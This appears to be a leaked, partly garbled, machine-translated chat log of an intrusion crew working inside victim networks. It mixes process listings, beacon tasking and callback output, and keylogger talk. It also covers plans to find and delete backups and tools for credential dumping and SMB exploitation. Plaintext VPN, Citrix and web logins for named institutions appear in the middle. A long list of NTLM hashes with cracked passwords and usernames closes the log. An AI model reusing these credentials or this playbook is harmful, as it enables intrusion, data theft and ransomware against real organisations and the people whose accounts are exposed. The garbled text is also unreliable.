explorer.exe 53264 Console 4 80,220 K Unknown WATERWAY\blauer 0:01:07 N/A
chrome.exe 37108 Console 4 154,368 K Unknown WATERWAY\blauer 0:01:33 N/A
chrome.exe 46140 Console 4 107,296 K Unknown WATERWAY\blauer 0:00:29 N/A
chrome.exe 43940 Console 4 35,532 K Unknown WATERWAY\blauer 0:00:00 N/A
YourPhone.exe 26416 Console 4 9,788 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 22076 Console 4 8,744 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 19712 Console 4 66,772 K Unknown WATERWAY\blauer 0:00:13 N/A
chrome.exe 39172 Console 4 49,756 K Unknown WATERWAY\blauer 0:00:03 N/A
chrome.exe 30856 Console 4 61,040 K Unknown WATERWAY\blauer 0:00:07 N/A
emulator.exe 20016 Console 4 7,188 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 54264 Console 4 5,460 K Unknown WATERWAY\blauer 0:00:00 N/A
qemu-system-x86_64.exe 49880 Console 4 1,016,956 K Unknown WATERWAY\blauer 0:37:15 N/A
cmd.exe 4 43928 Console 4 3,516 K Unknown WATERWAY\blauer 0:00:00 N/A
emulator64-crash-service.    40780 Console 4 9,740 K Unknown WATERWAY\blauer 0:00:00 N/A
audiodg.exe 42216 Services 0 16,752 K Unknown NT AUTHORITY\LOCAL SERVICE 0:02:41 N/A
devenv.exe 21888 Console 4 380,748 K Unknown WATERWAY\blauer 0:04:09 N/A
PerfWatson2.exe 15704 Console 4 44,628 K Unknown WATERWAY\blauer 0:00:03 N/A
Microsoft.ServiceHub.Cont 2708 Console 4 44,828 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 55252 Console 4 5,488 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.IdentityHost.e 16320 Console 4 53,324 K Unknown WATERWAY\blauer 0:00:03 N/A
conhost.exe 27172 Console 4 5,528 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.ThreadedWaitDi 55052 Console 4 45,404 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 28896 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A
Broker.exe 53112 Console 4 35,228 K Unknown WATERWAY\blauer 0:00:54 N/A
conhost.exe 50116 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.VSDetouredHost 31776 Console 4 51,816 K Unknown WATERWAY\blauer 0:00:03 N/A
conhost.exe 25996 Console 4 5,508 K Unknown WATERWAY\blauer 0:00:00 N/A
IDB.Local.exe 49208 Console 4 43,628 K Unknown WATERWAY\blauer 0:00:06 N/A
conhost.exe 42228 Console 4 5,512 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.RoslynCodeAnal 46356 Console 4 74,132 K Unknown WATERWAY\blauer 0:00:08 N/A
conhost.exe 10928 Console 4 5,516 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.SettingsHost.e 21260 Console 4 70,072 K Unknown WATERWAY\blauer 0:00:08 N/A
conhost.exe 23504 Console 4 5,504 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.Host.CLR.x86.e 16312 Console 4 44,724 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 46424 Console 4 5,524 K Unknown WATERWAY\blauer 0:00:00 N/A
powershell.exe 25052 Console 4 42,496 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 36704 Console 4 5,568 K Unknown WATERWAY\blauer 0:00:00 N/A
powershell.exe 39464 Console 4 38,496 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 42828 Console 4 5,548 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.Host.CLR.x86.e 22680 Console 4 32,824 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 52664 Console 4 5,520 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 19972 Console 4 52,024 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 41692 Console 4 32,116 K Unknown WATERWAY\blauer 0:00:00 N/A
Veeam.Backup.Manager.exe 9088 Services 0 63,532 K Unknown NT AUTHORITY\SYSTEM 0:00:04 N/A
conhost.exe 45996 Services 0 5,508 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
devenv.exe 49028 Console 4 254,220 K Unknown WATERWAY\blauer 0:02:49 N/A
PerfWatson2.exe 53460 Console 4 42,212 K Unknown WATERWAY\blauer 0:00:02 N/A
Microsoft.ServiceHub.Cont 12532 Console 4 41,724 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 27588 Console 4 5,068 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.IdentityHost.e 37332 Console 4 51,708 K Unknown WATERWAY\blauer 0:00:03 N/A
conhost.exe 22424 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.VSDetouredHost 20684 Console 4 46,500 K Unknown WATERWAY\blauer 0:00:02 N/A
conhost.exe 18008 Console 4 5,080 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.SettingsHost.e 52704 Console 4 67,064 K Unknown WATERWAY\blauer 0:00:09 N/A
conhost.exe 20140 Console 4 5,100 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.Host.CLR.x86.e 38728 Console 4 38,788 K Unknown WATERWAY\blauer 0:00:01 N/A
conhost.exe 21596 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 32416 Console 4 17,808 K Unknown WATERWAY\blauer 0:00:20 N/A
node.exe 3908 Console 4 12,988 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 34072 Console 4 5,236 K Unknown WATERWAY\blauer 0:00:00 N/A
conhost.exe 3076 Console 4 5,192 K Unknown WATERWAY\blauer 0:00:00 N/A
node.exe 26828 Console 4 12,384 K Unknown WATERWAY\blauer 0:00:00 N/A
ServiceHub.RoslynCodeAnal 26300 Console 4 47,016 K Unknown WATERWAY\blauer 0:00:02 N/A
conhost.exe 9604 Console 4 5,088 K Unknown WATERWAY\blauer 0:00:00 N/A
Zoom.exe 38420 Console 4 39,900 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 6204 Console 4 110,316 K Unknown WATERWAY\blauer 0:01:20 N/A
chrome.exe 16424 Console 4 75,636 K Unknown WATERWAY\blauer 0:01:17 N/A
chrome.exe 46452 Console 4 83,048 K Unknown WATERWAY\blauer 0:00:40 N/A
Acrobat.exe 21524 Console 4 65,508 K Unknown WATERWAY\blauer 0:00:06 N/A
Zoom.exe 28588 Console 4 47,484 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 8984 Console 4 86,464 K Unknown WATERWAY\blauer 0:00:22 N/A
dllhost.exe 47920 Console 4 8,100 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 52124 Console 4 73,676 K Unknown WATERWAY\blauer 0:00:18 N/A
chrome.exe 41936 Console 4 63,712 K Unknown WATERWAY\blauer 0:00:04 N/A
chrome.exe 33212 Console 4 216,916 K Unknown WATERWAY\blauer 0:04:37 N/A
chrome.exe 40412 Console 4 33,820 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 40984 Console 4 44,148 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 26948 Console 4 43,064 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 33364 Console 4 47,340 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 38164 Console 4 50,728 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 51816 Console 4 47,136 K Unknown WATERWAY\blauer 0:00:04 N/A
chrome.exe 43836 Console 4 35,044 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 10436 Console 4 34,308 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 37792 Console 4 34,644 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 7472 Console 4 39,116 K Unknown WATERWAY\blauer 0:00:02 N/A
chrome.exe 19540 Console 4 33,328 K Unknown WATERWAY\blauer 0:00:00 N/A
ONENOTE.EXE 25564 Console 4 153,504 K Unknown WATERWAY\blauer 0:00:08 N/A
chrome.exe 21624 Console 4 66,676 K Unknown WATERWAY\blauer 0:00:03 N/A
chrome.exe 50940 Console 4 73,456 K Unknown WATERWAY\blauer 0:00:11 N/A
chrome.exe 11836 Console 4 108,808 K Unknown WATERWAY\blauer 0:00:11 N/A
chrome.exe 54380 Console 4 51,232 K Unknown WATERWAY\blauer 0:00:00 N/A
svchost.exe 2308 Console 4 32,304 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 55992 Console 4 269,452 K Unknown WATERWAY\blauer 0:00:29 N/A
svchost.exe 34868 Services 0 6,704 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
svchost.exe 44168 Services 0 7,028 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
chrome.exe 53128 Console 4 89,820 K Unknown WATERWAY\blauer 0:00:07 N/A
chrome.exe 50200 Console 4 86,080 K Unknown WATERWAY\blauer 0:00:01 N/A
chrome.exe 55936 Console 4 167,528 K Unknown WATERWAY\blauer 0:00:06 N/A
TrustedInstaller.exe 55536 Services 0 7,016 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
TiWorker.exe 48204 Services 0 28,180 K Unknown NT AUTHORITY\SYSTEM 0:00:00 N/A
chrome.exe 23068 Console 4 22,080 K Unknown WATERWAY\blauer 0:00:00 N/A
chrome.exe 42260 Console 4 41,352 K Unknown WATERWAY\blauer 0:00:00 N/A
RuntimeBroker.exe 21768 Console 4 26,860 K Unknown WATERWAY\blauer 0:00:00 N/A
cmd.exe 9420 Services 0 4,360 K Unknown WATERWAY\mharper 0:00:00 N/A
conhost.exe 29152 Services 0 11,432 K Unknown WATERWAY\mharper 0:00:00 N/A
tasklist.exe 34544 Services 0 9,940 K Unknown WATERWAY\mharper 0:00:00 N/A
``Tasked beaconed tasklist / I'll double-check from the context? I tried it
``Tasked beacon to take screenshot
[+] host called home, sent: 199779 bytes
[-] screenshot from desktop 0 is empty ``and give a screenshot of his desktop just every time I do it randomly, and maybe there is a best practiceson I wrote when I looked so you weighed the keylog itself? preferably not falling off)[ ](https://mediaeveryone.com/group/waterway-com?msg=ayxHgDJKv4nb9sdm4) and the process any?[ ](https://mediaeveryone.com/group/waterway-com?msg=NrNsCZgkh2skCJgQr) polzak contextI had a keylogger in `Rackspace` can you find anything here about the keylogger - on which processes and under which polzak to hang it correctly?i can't remember in whose work) the one in mine is in fact in another case (if you suddenly thought about mine) i saw exactly in someone's active keylogger in other kobs have you checked? keylogger session hangs why then i did not put keylogger (in the keylogger is empty?[ ] (https://mediaeveryone.com/group/waterway-com?msg=psi8ispBmgEugAhA5) it has already appeared in the dialogue) i remember if you put the keylogger? scared me, however) i went to the Watchguard and there all is normal all is normal as i understand it on the site and not monitor their network ``Waterway Customer Service `` <CustomerService@waterway.com> ``sender who? just a general report came for all time-date 4-readdono not read?I did not understand the joke about the russians in the mail the links in the boxes met? all collected browsers passed and nowhere is `infosight.hpe.com or hpe.com` I did not find myself in the removed, I do not know how the colleague does not have a link in browsers?[ ](https://mediaeveryone.com/group/waterway-com?msg=KtNRtbz2vAivRZAHE) seems not. when the client creates folders in the programdata. I did not find any (`)
https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2
````infosight.hpe.com or ``hpe.com'' link above look in browser histories ``Download the latest version of the HPE Nimble Storage Windows Toolkit (NWT) to install on your Windows host or Windows VM.
     Log into HPE InfoSight (https://infosight.hpe.com/). If you do not have a password, click New user? Enroll now.
    Click Resources > Software Downloads .
    In the Integration Kits pane, click Windows Toolkit.
    From the Windows Toolkit (NWT) page, click Software (64 bit) under Current Version.
    Note: For NimbleOS 3.4.0 and later, only a 64-bit package is available.
    Note: The Windows host must be on the same subnet as that of the array to be set up.
    Save the NWT installation package to your Windows host. The installation package has a name similar to Setup-NimbleNWT-x64.x.x.x.x.exe, where x64 is the supported microprocessor and x.x.x.x is the NWT version number.
    Download the latest HPE Nimble Storage Windows Toolkit Release Notes. Review the list of Windows Server hotfixes.
    Note: If you are installing HPE Nimble Storage Setup Manager alone, then no hotfixes are needed. However, the .NET framework requirements still apply. Hotfix requirements are mandatory for any Windows host in which the HPE Nimble Storage Connection Manager is used to connect to HPE Nimble Storage volumes.
\
``````
https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/nbt1481004374959.html
``t the machine is empty?[ ](https://mediaeveryone.com/group/waterway-com?msg=KPT66hnHWB3eLD5A9) LEVASHENKO-PC: 192.168.0.22 mharper is there a separate letter or is there a crack?[ ](https://mediaeveryone.com/group/waterway-com?msg=k4A3sFeJeHsd3j3pQ) ?yup then they changed the18th year I specially went down to find something like that, I mean when the accesses were distributed the message was ancient did you try this message as a password?and from what date the message? do you have his car? and you on his mail? does not fit the account[ ](https://mediaeveryone.com/group/waterway-com?msg=fXqsXx4qGPyRbox7d) that is the pass to the system account?so you can work with it more quickly do you have a topic on the forum on backups? if not, then nimble, one click whole tachku delete there? but it's postponed, come in handy then we need nimble(yes8 not the server?[ ](https://mediaeveryone.com/group/waterway-com?msg=L8AyTRkJYFWbpwPjB) there are only 8 computers (only 8) this correspondence about nimbly and also tried all the passwords I know how many computers? and what kind of backups? also on bitdefender hitchcrazy) give coba clean, if there. and not draw nifig...took ``
Sanntech::Sanntech-PC:685EA697C50F3172:44CCE85E9FDE05B968D5240074C7315F:0101000000000000C7E2346747FAD601F70FA34BEF4A2EE80000000002000800530043004300590001000E0053004300430059002D003100330004000800530043004300590003000E0053004300430059002D003100330005000800530043004300590007000800C7E2346747FAD60106000400020000000800300030000000000000000100000000200000DD64E878CBD5192E170396004E5BF488872A87BCC7AB9432A3E2D86B7CF882D40A001000000000000000000000000000000000000900120048005400540050002F007700700061006400000000000000000000000000
``There. see different ips) 209.222.97.50:10201 this is mine and I do not have another one.206....24[ ](https://mediaeveryone.com/channel/general?msg=9G9GPaySX5fNYHYD4) about itThat's what kind of a dedic? You mean what ip)I have long ago, you gave it and asked after configuring you to write a picture and you can roll it back. Look even there is a softs kotryy you have not put) I have not configured access to your addy, I gave you ` own` I gave him to work with evo with a already configured vpnomvzaimno no, you what confuse that squeeze me) is myparu min@user3 you took? not me, mine `209.222.97.50:10101` who took my addy after # evo-com?and i don't get it give you a fresh build tulchyna then 20 mnahahaha second you don't have to go shashitvo first these copypastes devil's toy go all the buttons i need to write one option)can combine )@all i'm preparing you a guide to speed up work, you want to poke buttons in the tulch or copy from the guide?okily let someone tell you a few posts above on updating settings for someone who came to life)we still have 10 hours too early)ready to go to sleep now + we will have a general discussion on process optimization next week will be very busy, so I recommend you get some sleep this weekend if you need more than one, this is a separate special order1domain one, or will there be different?++understood? now everywhere use domain in https hosts (stager) ip domain you used to specify the domain in httpshosts in the settings koba little change all in the attention I have an announcement call everyone in the chatty cute sweetdalay i still in koba @user9 sit time why drag it out to replace there is nothing in google that sessions do not fly so if nothing in google, what do you say?why are you silent? I think nothing in google, but it does not fly there@user8 what's wrong with the cob? and herehttp://github.com/asciimoo/exrexhttps://www.passcape.com/password_recovery_maskхешкат can do this? https://github.com/hashcat/maskprocessorгугл no need to remind the fuckin' ping, there's nothing wrong with it
if not - remind me) so check the method known@tl1
try to pass any session in agesk.com
i got nothing from last login, not from coba @user9
check how dirty is 1? i'm also in CRISPREGIONAL.ORG@user9? someone is not enough to get to ehiska than from putty to pull the cribs for #1-done-crispregional-org
in passing at #0-dead-waterway-com checked to see if they're up or not. The situation since yesterday hasn't changeddrawing adinfo from trusts in #corp-televisa-com-mx so who's doing what? Fuck, everyone had it, but it fell off at different intervals[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) were only in one cob?[ ](https://mediaeveryone.com/channel/general?msg=BW3aGy9eQmo2mnQxF) I don't see it fixing[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, but while I was helping the other one, it fell off.
you fixed it yourself and that's it[ ](https://mediaeveryone.com/channel/general?msg=uM3C6eJm8Go9riDeu) yes, user4 with it
2 no answer urgently plz, is it up and running? hello, some of the servers were restored in yesterday's
see what's up? hello everyone
https://ftuapps.dev/proxifier-standard-edition-3-42-x64-x86-keygen-portable/
``from the machines where you can not go dump the craps through the cme how are you doing? good morning, thank you all goodnight)https://hackware.ru/?p=11287LM:NTLMт e in this format takes hash yes?good morninGood morninGood morninGood +++ accepted If i will not be there by this time and you have a deadlock you can go home before 1 o'clock then i think how to do it there is an option to do something with relayda, there are about 6 dk and all are patted erogon also past? try all kinds of web services scanners look forda, already tried 100 times on other pc's tried?there is a ghost of hope for sbmgost and ethernal? there is a ghost of hope for shulcitra alsoexcch can't be seen noasharfineedr gave nothing? nothing at all? well, there is another thing for 20k pc 0 services? more specifically nothing can be seen citra, vcenter, shul etc. there is almost 0 (refer to services within the network) well in general we have a deadlock now in our network, maybe some other vectors you can suggest?tomorrow by 5 what a delight))) to 2 work with what we have today without sessions) to 10?)))) by how many sessions will be available? only 2 will be available, the other creeds are not valid (so do not turn off I ran across some that were available, they need to connect to turn off the winDFto yesterday have not finished?
dig into snpartners.com. what's the task?
108.62.118.209
https://simvp.com
-
104.194.11.10:50058
ZdAscYQ31DMSJ9EsJ4DcntCSrubZt9gRVyX
yes and yes@user9 don't you have t eotclick in sessions? is this new?)
i'll ask around and see if anyone has tried it elsewhere) i found the addressee's addressee codes and i'm just messing around with them. i read the docks too) there may be a differentiation of rights for some reason
Look at the docks for the suite I can't tell you, but it should be in the documentation.... I'm inside Veeam One monitor and I don't know how to delete backups...it seems to be a cloud version of Veeamclearance have you dealt with VeeamOne?
I have!
``You did, but it's probably expired - it won't let me in.``Hi
didn't they give you a Kmd5 account? no, they didn't) ``aac86ad4320f7cca879a87724c7d3647 ``need clears from Kmd5DC
```
Server Name IP Address
 ----------- ----------
 Z1AD3 192.168.1.41
 Z1AD2 10.10.0.2
Ok. reshoot it I would recommend that you reshoot the adinfoTill tomorrow, everyone will show extra sessions on this today that[ ](https://mediaeveryone.com/channel/general?msg=cp3jcby6d8QQMTgur) Group is not, so I'm writing here
Brut finished, of course nothing was brutalized
scanned more on skul, ftp, webs
tomorrow the plan is to let ms17-010, but no credits, so I think the result will be the same as with smbot write to the group at what is over remember to send kerbs @tl2I took kerbsort servers 63sh thought someday will go to the thousandth restart, but no, the system failed and now sometimes loads less:zany_face:I do not know their domain, while I am not online? meaning from the dedicam under wpn `unf.edu `?
there is a hash of LA and a bunch of computers where it fits, but it's all Windows 10 Educational
I tried that hash on the servers and it didn't fit.
All my sessions are dead and the domain is in the black.
trying to enter the coboo, which broke yesterday from the tulchain's addfynd, hangs on about 90%, but every restart loads ~20 bytes more :thumbsup:[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) on my
got the VPN up - scanned the ip scanner from my ip/16
scanned the ports of the PCs I found, there are some with 445
let smb_login with the codes that are and . in the domain, in case there will be so what do you have at the end of the day? from 1:00am to 10:00pm to what time? please let me know how you are doing on the tasks give me an ip in a private message I can reload the dedic?put vnts and connect so)[ ](https://mediaeveryone.com/channel/general?msg=gWidZnXBAk4A935Ga) here is the link to the vpn, but after starting the vpn, the dedicle, apparently, goes beyond the vpn (when connected to the vpn just hangs RDP, after reconnecting RDP - vpn off. After turning on the same goes for a VPN and hangs) will save a lot of time for those who do not have anything except LA Credits on a bunch of machines
https://github.com/Hackndo/lsassy
use this one
take the time to set it up correctly once.
so you have a set VPS on hand for this fuckin' thing right now
https://vpn.floridapoly.edu austinwise0712 MechEng030796!

```
@user9 substituecan't you do anything fun in the settings? Is there any way to tunnel if there's no .cr download option?
I tried the citrix.tmwcloud.com link and creeds, but the connection just hangs in the download.
In citrix itself, all icons are disabled, everything is not available.
https://citrix.tmwcloud.com/gti/auth/login.aspx mritchie Welcome01

```
@user9 replacementwhat can you do with it?)[ ](https://mediaeveryone.com/channel/general?msg=oL6a59ZRrXQpcJ8sv) and here it's not clear, it's some kind of crm
did not find a console or something where you can send commands or a file to cram
Terminal Door Control - toggle switches open/close doors, vending and so on, write the status to the group
https://www.emorycard.emory.edu/onecardwebadmin/operator/logon cwatson yourdoom23

```
@user9 no substitute, empty nothing at all in the citra? @tl1 can i have a substitute?
ipn does not come up and nothing can be taken out of the citra because there is nothing there.already createdhumboldt.edu external domain what? can i have a confu `AD.HUMBOLDT.EDU` output to confu then why is the output different? they are localgroup that not /domainlocalgroup /dom?[ ](https://mediaeveryone.com/channel/general?msg=qGXwKiGcGYSmbDoxQ) maximum strange design if you connect not through a browser it will hang[ ](https://mediaeveryone.com/channel/general?msg=Cm4AQuumDNbMoDprq) and it should ask the user to start the upa which I downloaded earlier@tl1 @tl2 What if I use net localgroup "administrators" /dom I get domain users with admin rules on the machine where I start it?[ ](https://mediaeveryone.com/channel/general?msg=cAmidLT3JooCsCNQE) a blank account, nothing in the zip
it's not always clean, but you have to know it or you can uncheck your settings and it will show you the path to the history
Get-PSReadLineOption
``````
History File Information. The default location for this file is $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt .
``How do you clean it up?`` Who else don't know if you can store command history on the system?
https://vlab.humboldt.edu/rdweb/webclient/ vl77 M1lksh@ke

```
@user7 replacementa what do you have?
https://apps.ufl.edu/citrix/xenappext/auth/login.aspx icebecky PeGjzXpnvx3Mjp$

```
@user9 replacementwrite status please work in your confurdn will be ready by night, so you will issue it tomorrow. today we are working under current conditionsThis is good newszbs + so that in case of what you can roll it back I will make you a snapshot of the state immediately as you pick up your personal, change the password from the account and send me in a personal message new password then configure your environment but the basic state soon - during the daymne 16)))there are 3 wine 10 and 3 wine 2016 ok! Glory to the great wars! you will soon be issued individual vindustadny granddisks by tasks in the confab immediately) I am close to a standstill
I had a story yesterday on /16 on 445 from his sabinet, but nothing found) but it's like Everyone has a task?okkakak you remove the hashes at once jump to a couple of servers in addition)naturally)and whether the account is active at all and so check the validity firstOk, kerb I saw - will dtsink doCHalf an hour will come and if there are problems will lookmne need to leave for half an hour now will be, so just say, keep working on yesterday's tasks, you also have 4 dedics now, kobs and everything else the same@user4 you there kerb scrubbed) @tl2 to the conf conf conf skniulHi, not there yetAnybody here? All hello:space_invader:tomorrow by 2 today until 10```.
System Boot Time: 12/28/2020, 12:01:39 PM

``He doesn't turn off the car?
====== AntiVirus ======

  Engine : Spybot - Search and Destroy
  ProductEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
  ReportingEXE : C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe

  Engine : Security Manager AV Defender Antimalware
  ProductEXE : C:\Program Files\N-able Technologies\AVDefender\WscRemediation.exe
  ReportingEXE : C:\Program Files\N-able Technologies\AVDefender\EPProtectedService.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe
``12:03 PMav what?[ ](https://mediaeveryone.com/channel/general?msg=poHHucH2R6fwbP7Ss) seems like it should''
  CurrentUser : WATERWAY\mharper
  Idletime : 01h:11m:03s:765ms (4263765 milliseconds)
``So isn't the session in keystrokes supposed to be empty?`` So maybe it's not typing?`` On the contrary, the hartbit is 0 and the session is still dead.Here I don't write keyloggercontext user in svchost[ ](https://mediaeveryone.com/channel/general?msg=mXPPGXmFrDTjn3jAw) and the keylogger is not put it.`` On mharpernew under the mharper user I found such a thing
```
https://store.vmware.com/,https://store.vmware.com/store/,10/7/2019 12:44:17 PM,13214943857640860,mharper@waterway.com,1Vanilla2
```
he also had this in his sharpshooter output
```
http://192.168.0.43/,http://192.168.0.43/,10/21/2019 11:08:36 AM,13216147716516941,,
```
it's nimble, i.e. walks, but no credits(
 
on the same computer found a password-protected file Passwords.xlsx, on the off chance I poked the administrator password, came up, nothing interesting
now trying to open two aacdb-shek@tl1 Checked all available servers/arms everywhere KB stands, now go to the armies check the files, mb that will be. interesting @user3otnick that you have on the results go to the guys (+ at all? no problem, tell the others that you can so time to waste) thank you okay?
bdfb6cd5e3fd0d06ddcb550a10dd935d Mollydog1!
04d5eff0ad5cfa74893376377799e6e4 Edith@2013
371464bd973caf912b2eb57d6e8b8c8d Soccerfun2!
bd626598054a653c5b29362e7ccf0fda @@rdv@r$
1160d864b8efdbf3a2a7789fb7dbf852 S$ophia91
07d4c3a9293355b60d47b8af140658b5 Babe8652
da1b9ecaaafa492621baec7db4e0768c Dexter56!
a6aee6e3cee15dcc6c1da0c0029c9d0e Cheers21
0a1737099297bce33028550c609d51fe Santacruz1
3ef41951b919a7a714f5ccd94d2785b9 Playmakr59
515105422901de09e5147150eae90fc1 Snoopdog6
2aa61789ef2ffea7dde6dd2a669d8b14 Poncho1953
d7a56add2083dbb16f2967ee4a43693c hawaii9
589b85762d8ab451401df29aa7fdc417 Winter2020
f0d246ee027ba7e2222d11f532e33396 RVlife1!
50131ca82ae8323af7bf0a33ce195f6b Ginny12345!
8174a4102f8e0c19ced57f48fbf854ef mima2015
9553947130d99b5305e7c6e2c55f19f6 Bassbass89!
8c07cda602b94dfcf44f1695910a39df Thankgod99*
98bde6ce745eee9db8730f46a1fa4c43 22Marcus22
df3cad6b33ff0a54309cc2c131b7e9fd Cotija207
27909a110b4e50b486d51702bd86857d Quality2!
e7be7281093d53dcfabd8eb3970d0393 R1f12l66$
a9aec143fc91ff315015840d0407c7bd Firstone55
65027469316266a14abe5e628cccfcd0 Molly71@
2b323b1cfec9165938df237613b381a2 Korbel011
f36fee819dad37f174b81b078b296e2e Vineyards15
baf8e023e871f3b5f79512a57c6a62e7 Year2021!
6189b54305abed05d16b60b48cf72ed7 maguey#5
a8588850ef9e29663757ec2382d8fc3b Jackie38
77a37eab2d43a85725f7c90fee594d59 Korbel58
39e1ce27741039350266829c0f7eb4e8 Lucy@2013
f48f52d28ea79b1d658ca5d66c5bff36 M@tt0420
e4a22d8e7bbec871b341c88c2e94cba2 Welcome123!
a1c70a25f68e27c1c0012bb0d58edd66 8barrett!
763ebebf2ba3134afe8f001617a36755 Outofhere!
ec3ccfd708b8aad44bde184a8cef8bcf Kaleb2008
3cd4601799b7516ccf31d5216ed6a5fa Doggies123
2857f0e40a794a646315b20612cabce6 Jaxson2020
ce38fef132030421c1f237301b208ac6 Mexico2021
2af0abe976a17fe926f45fbd26ef9b3b Hermida*14
271f5f4c31c1eccd00458e1884f8111a rich@ter35
c15c6cf00354b412ffb695036bb0da0f Ballplayer3
88da42440abb98e98baaf8d71f6788f0 @dv@n+3l
263dccb097be7270f29ad93249f025b3 Nopass20!
1aef4a9d29b3918e068acf0c40a6d0e4 Frankie8835
b03e5d6101f4428fc15a4af13c2d1f67 Korbel!3
9f492d9fd317748b07d36eead23bd236 Autumn1!
0f9b7619fddf9e02d061d3c580b77820 Lovemy4kids
1ac39bdd695eb913a4f0b73d9159e53d ChangeM3@
ba03a114def8d5c913983436960e592c pass@word1
6be408f1e80386822f4b2052f1f84b4e P@ssw0rd3

´´So I'll let go then?´´ The first three have passed.´´
kirsten.matteri bdfb6cd5e3fd0d06ddcb550a10dd935d
mayria.parmeter 04d5eff0ad5cfa74893376377799e6e4
danielle.matsumura 371464bd973caf912b2eb57d6e8b8c8d

Jcomfort bd626598054a653c5b29362e7ccf0fda
cncsupport 728f33af6ae2a27678028814ab411554
Areoutt 1160d864b8efdbf3a2a7789fb7dbf852
Mhealy 07d4c3a9293355b60d47b8af140658b5
Mroche da1b9ecaaafa492621baec7db4e0768c
PAhvenainen e6242a3a5b39d06307c96f3b77f45f59
Rmarson 8d6d8b8edd61fe852558ed756a8991f3
Lrussell a6aee6e3cee15dcc6c1da0c0029c9d0e
Mindrebo 0a1737099297bce33028550c609d51fe
Bwalsh 3ef41951b919a7a714f5ccd94d2785b9
Gruhland 02b67f42c10f9ce871cd7b24ac0bdff7
Debbie d74378f8a658b50b8acbd4032490fabe
Chakola 515105422901de09e5147150eae90fc1
Serena 891612a4d50457d2c543bc37f0563e90
Dfaris 3fafb54aa5524a39f1298338f6464335
Shollander 2aa61789ef2ffea7dde6dd2a669d8b14
Candrade d7a56add2083dbb16f2967ee4a43693c
Kfaris 752084462e4136656173014ec09bd462
Lreynaga 589b85762d8ab451401df29aa7fdc417
Lcabitac f0d246ee027ba7e2222d11f532e33396
Sschlabach 50131ca82ae8323af7bf0a33ce195f6b
Ahealey 8174a4102f8e0c19ced57f48fbf854ef
Jbidia 4168560575faed5ed2547df2d5935a31
Drhodehamel d5c9925e3cc9d79772c079bccca7b41b
matthealey aaaa2ed2f1ae8dbd18bbd1eff3b90ce6
Aomiotek 9553947130d99b5305e7c6e2c55f19f6
jkrambs 201948eb76f41a6cd4ee48ce49702805
Dan ace98571b9d8b729bc3907c274fe5421
jeannine 8c07cda602b94dfcf44f1695910a39df
Dhaught 98bde6ce745eee9db8730f46a1fa4c43
Gary 8f356149e6b800293dbf993e2cfa0a8f
Jrobertson d96d7fa2b91611712a551cdd11464fb9
Tmazzola 959541859e8db46868cf0c28dc959339
Dsanchez df3cad6b33ff0a54309cc2c131b7e9fd
Ltorres 27909a110b4e50b486d51702bd86857d
Rvalencia e7be7281093d53dcfabd8eb3970d0393
lgiang a9aec143fc91ff315015840d0407c7bd
Jyoungberg 65027469316266a14abe5e628cccfcd0
Hsiniscalco b939fe7947d85a151fde29b100f3d073
Hcscalehouse1 6b3585ea1524578e252eb70e11b40362
hcscalehouse2 6b3585ea1524578e252eb70e11b40362
senturus 70032882faf3427cf9904be36750fee1
senturus2 70032882faf3427cf9904be36750fee1
Econtreras 1973d3c3267dbfe1729e58c3858262fc
